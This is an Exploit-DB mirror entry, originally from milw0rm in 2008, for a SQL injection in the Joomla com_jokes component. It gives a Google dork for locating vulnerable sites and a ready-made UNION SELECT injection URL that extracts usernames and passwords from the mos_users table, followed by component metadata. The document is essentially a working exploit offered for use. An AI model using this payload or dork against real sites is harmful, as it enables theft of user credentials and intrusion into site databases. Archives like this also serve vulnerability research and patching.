exploit-db-mirror/exploits/php/webapps/5015.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

38 lines
No EOL
1.3 KiB
Text

#########################################################################
#
# joomla SQL Injection(com_jokes)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#########################################################################
#
# DorKs 1 : allinurl: "com_jokes"
#
########################################################################
EXPLOIT :
index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*
#########################################################################
# S@BUN www.hackturkiye.com S@BUN
#########################################################################
# S@BUN GOOD LUCKY S@BUN
#########################################################################
<mosinstall type="component">
<name>jokes</name>
<creationDate>29/12/2005</creationDate>
<author>Atapin</author>
<copyright>Released under the GNU/GPL License</copyright>
<authorEmail>info@atapin.net</authorEmail>
<authorUrl>www.atapin.net</authorUrl>
<version>1.0</version>
<description></description>
# milw0rm.com [2008-01-30]